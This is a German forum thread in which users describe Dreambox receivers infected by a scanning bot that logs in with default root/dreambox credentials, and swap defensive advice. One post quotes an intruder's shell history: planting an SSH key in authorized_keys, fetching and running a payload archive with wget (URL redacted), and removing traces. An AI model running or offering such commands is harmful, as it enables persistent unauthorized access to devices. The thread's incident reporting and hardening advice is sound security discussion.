Dreambox Virus / Bot entdeckt!

  • Hab da was krasses erlebt heute ... wusste gar nicht das es sowas gibt


    Mein Kumpel hatte Tagelang probleme mit seiner dreambox. jeden tag gecrasht und danach waren irgendwelche dateien im /lib/ ordner ausgetauscht und enigma startete nicht mehr. Musste immer neu flashen und nächsten Tag ging wieder nix.


    Hab ihm dann heute mal geholfen und rausgefunden das seine box permanent im internet erreichbar war weil er portfreigabe gemacht hat für telnet und ftp damit er von der arbeit und so auf die box kommt. Leider standard username/passwort mit root/dreambox.


    Eben war seine box wieder hinüber. Konnte dann im aktivieren FTP und Telnet Log auf seiner Box sehen das sich einer eingeloggt hat auf der box aus polen, ein paar files auf die box kopiert hat und irgendnen unfug gemacht hat.


    Konnte lustigerweise die IP selber im browser und ftp erreichen mit standard root/dreambox login, war eine ENIGMA1 Box ...


    Auf dieser fremden box lief ein prozess names "m5" das wohl permanent irgendwelche internet ip ranges gescannt hat und probiert hat sich dort mit root/dreambox einzuloggen und wenn login erfolgreich, dann wurde der bot auch da installiert und ein paar libs ausgetauscht die den bot starten. Diese Box hat dann wohl jeden Tag meinen Kumpel probiert zu infizieren und den bot zu installieren.


    Da es LIBS sind für enigma1 crashte aber die box von meinem kumpel immer weil die für POWERPC und nich MIPSEL kompiliert sind ...


    Kann in dem kompilierten "m5" binary nich viel erkennen, aber es ist aufjedenfall nen BOT der IP's scannt und sich dann probiert damit zu verbreiten.


    Aber da sind ein paar text strings zu erkennen die klar drauf hindeuten das es sich um einen bot handelt, befehle wie DDOS, IP Scans usw usw.



    Der prozess lief auf der box aus polen dutzende mal und hatte dutzende aktivie Internet verbindungen .... war also fleissig dabei fremde boxen im internet zu suchen wo man sich mit root/dreambox einloggen konnte. Und wenn das gelang wurden ein paar dateien ausgetauscht ... schlecht für enigma2 boxen das es sich dabei um powerpc libs handelt udn danach gar nix mehr geht.


    Hab mir die Bot Binaries mal geladen und gezippt, vlt kann da ja einer was mit anfangen aber vorsicht!!!


    Find ich krass ... wusste gar nich das es dreambox viren gibt. Zugegeben eine Box im internet zu haben ohne passwort bzw. mit standard root/dreambox login is nicht gerade schlau, aber das es Bots gibt die solche dreamboxen suchen und infizieren finde ich schon krass!!!



    [MOD] Anhang entfernt[/MOD]

    Theorie ist, wenn man alles weiß, aber nichts funktioniert.
    Praxis ist, wenn alles funktioniert aber niemand weiß warum.

    Einmal editiert, zuletzt von Reichi ()

  • Sehr interessant. Danke für deine ausführliche Information darüber, das sollte bei einigen User zu mehr Problembewusstsein führen.

    How can we win, when fools can be kings?

  • ja macht deutlich, das man mindestens das Passwort ändern sollte, wenn die Box extern ereichbar ist :winking_face:

    DM8000 HD, (sata) HDD + (sata) SSD - DeLOCK + (usb) Stick, OoZooN OE2.0 (flash)
    QNAP TS-209 Pro, TS-409U, TS-219P
    40'' LCD Toshiba 40ZF355D
    AV : Logitech Z-5500 Digital

  • Für solche Zwecke würde ich ssh mit Public Key Authentication empfehlen, was dropbear sehr wohl kann.
    So ein 2000bit RSA Schlüssel ist ein bisschen schwerer zu knacken als Passwörter die sich leicht merken lassen :winking_face:

    "From a little spark may burst a mighty flame." - Dante Alighieri

  • was soll daran jetzt so erstaunlich sein? Wenn ich so blöd bin und eine Portfreigabe zur Box mit Standard Benutzer/Passwort Kombi einrichte, muss ich damit rechnen das einer nen Script platziert. Viel erstaunlicher finde ich es, das Plugins wie TV Charts z.B. MAC Adressen der Boxen auslesen und an den Webserver übermitteln, ohne den User in Kenntnis zu setzen

  • Hey.


    Ich mach mal keinen neuen Thread auf. Ich glaube mich hat es auch erwischt.
    Wollte mich heute per Telnet einlogen ... geht nicht. Passwort wurde geändert.


    Ich hab dann den Zugriff wieder erlangt aber auf der Dream komische Dateien gefunden. Zb eine 100mb.test unter /home/root/autofsd
    Dazu dann noch eine .ash_history (ist das normal das die Terminal eingaben gelogt werden?)


    Sieht mir nach einen Virus/Bot aus.. :frowning_face:


    Inhalt der History:
    /sbin/ifconfig | grep inet
    passwd
    cd ~
    mkdir .ssh
    cd .ssh
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIB8NTwrTVNx8KZwzNj067GiIfz8Vc2DgqvmEatkwH1hjiM/jdrq2VFEAJI75AIdarHo1jVL7ZcpsmiIJQ3Pi+P0JdAXARK8PJEZyRQJLJusucbJeU9FI4drnPceKKthaSjVl/9bWa6ckmrYaFIfnNZtAH9CAWn6TCGb5lDfKdgC5Q== awsnext" >> authorized_keys
    chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys
    cd ~
    mkdir lib
    cd lib
    echo "lib-rsa
    AAAAB3NzaC1yc2EAAAABJQAAAIB8NTwrTVNx8KZwzNj067GiIfz8Vc2DgqvmEatkwH1hjiM/jdrq2VFEAJI75AIdarHo1jVL7ZcpsmiIJQ3Pi+P0JdAXARK8PJEZyRQJLJusucbJeU9FI4drnPceKKthaSjVl/9bWa6ckmrYaFIfnNZtAH9CAWn6TCGb5lDfKdgC5Q== awsnext" >> lib
    chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys
    cd ~
    mkdir autofsd
    cd autofsd
    echo "autofsd
    AAAAB3NzaC1yc2EAAAABJQAAAIB8NTwrTVNx8KZwzNj067GiIfz8Vc2DgqvmEatkwH1hjiM/jdrq2VFEAJI75AIdarHo1jVL7ZcpsmiIJQ3Pi+P0JdAXARK8PJEZyRQJLJusucbJeU9FI4drnPceKKthaSjVl/9bWa6ckmrYaFIfnNZtAH9CAWn6TCGb5lDfKdgC5Q== awsnext" >> autofsd
    chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys
    wget http://GELÖSCHT
    ifconfig
    cd /var/tmp
    wget http:/GELÖSCHT... ;tar xzvf gosh.tgz ;rm -rf scam ;cd gosh ;chmod +x *
    screen
    yum install screen
    ./go.sh 90.156
    cd /var/tmp
    ls -a
    rm -rf gosh.tgz
    rm -rf gosh
    mount -o rw,remount /boot – Enter
    mount -o rw,remount /boot
    cd ..
    ls
    cd boot/
    ls
    ls -lh
    exit

    --
    openwrt + minicom + screen = 24/7 Bootlog

    2 Mal editiert, zuletzt von Schnello ()

  • Box neu flashen und im Webinterface die neue Sicherheitsfeatures aktivieren.
    Das schaut nach dem gleichen Müll aus den sich auch Homey eingefangen hat, wo er sich irgendwas eingefangen hatte das sich übers Webinterface beim besuchen einer Webseite selbst installiert hatte.

  • Toller Hacker, der zu doof ist die History zu clearen.. :face_with_rolling_eyes:


    Eberhart
    Ich habe mein Verständnis der neuen Sicherheitsfeature im Merlin Board wiedergegeben.
    Bevor es jemand übersieht, wiederhole ich meinen letzten Satz aus dem Post hier nochmal: Reichi möge mich berichtigen, wenn ich falsch liege :smiling_face:

  • Danke für den Link. Immerhin ein sinnvolles neues Sicherheitsfeature, auch wenn es für mich weniger Bedeutung hat, da ich nie auf anderen Seiten surfe, wenn ich mal im Webinterface eingeloggt bin (was ohnehin selten vorkommt).


    Ich würde es wirklich befürworten, wenn schon im Auslieferungszustand mehr Sicherheit gegeben wäre, also standardmäßig die Passwortabfragen aktiviert würden und beim ersten Booten zur Vergabe eines individuellen Rootpassworts aufgefordert wird.

    How can we win, when fools can be kings?

  • Danke für den Link. Immerhin ein sinnvolles neues Sicherheitsfeature, auch wenn es für mich weniger Bedeutung hat, da ich nie auf anderen Seiten surfe, wenn ich mal im Webinterface eingeloggt bin (was ohnehin selten vorkommt).


    Ich würde es wirklich befürworten, wenn schon im Auslieferungszustand mehr Sicherheit gegeben wäre, also standardmäßig die Passwortabfragen aktiviert würden und beim ersten Booten zur Vergabe eines individuellen Rootpassworts aufgefordert wird.


    Das ist aber ein API Befehl da hilft dir der Passwortschutz des Webinterface nicht zwingend weiter.

  • Also mir wäre neu, dass man bei einem passwortgeschützten Webif (in einer nicht bereits authentifizierten Session) ohne Passworteingabe Zugriff auf die API hätte.
    Sollte das anders sein, dann klär uns bitte auf :smiling_face:

  • Ich glaube, dass wir etwas aneinander vorbei reden. Sicher ist der beschriebene Angriff nur möglich, wenn eine aktive Session zum Webinterface besteht. Sobald diese aber existiert (ggf. nach Eingabe des Passwortes), kann es der potentiellen Malware aber ziemlich egal sein, ob grundsätzlich ein Passwortschutz eingerichtet wurde.


    Meine Anregung war jedenfalls eher grundsätzlicher Natur, um zu verhindern, dass ein Einsteiger seine Box offen wie ein Scheunentor ans Netz bringt.


    Vielleicht äußern die Devs mal ihre Sicht der Dinge.

    How can we win, when fools can be kings?

  • Meiner Meinung nach sollte auch das WebIF nicht ohne weiteres nach außen Zeigen.


    Ich lasse es über meinen Raspberry PI nachaußen zeigen, mit einem ReverseProxy.
    Da ich auf dem Rasp. mehrere Firewall Settings habe und die Logs parsen lasse mit fail2ban...
    damit werden recht schnell die Leute ausgesperrt...

  • Das ist zwar löblich, aber schützt leider auch nicht vor den anscheinend neuen Crossite-Scripting-Angriffen, weil da ja dein Browser "zur Waffe wird"...

    so long
    m0rphU

  • Jedenfalls ist die Konfiguration standardmäßig nicht besonders sicher.


    Ich nehme aber an, dass es dazu nicht viel weiteres zu sagen gibt, sonst hätten sich die Devs bestimmt mal zu einem Kommentar herabgelassen :winking_face:

    How can we win, when fools can be kings?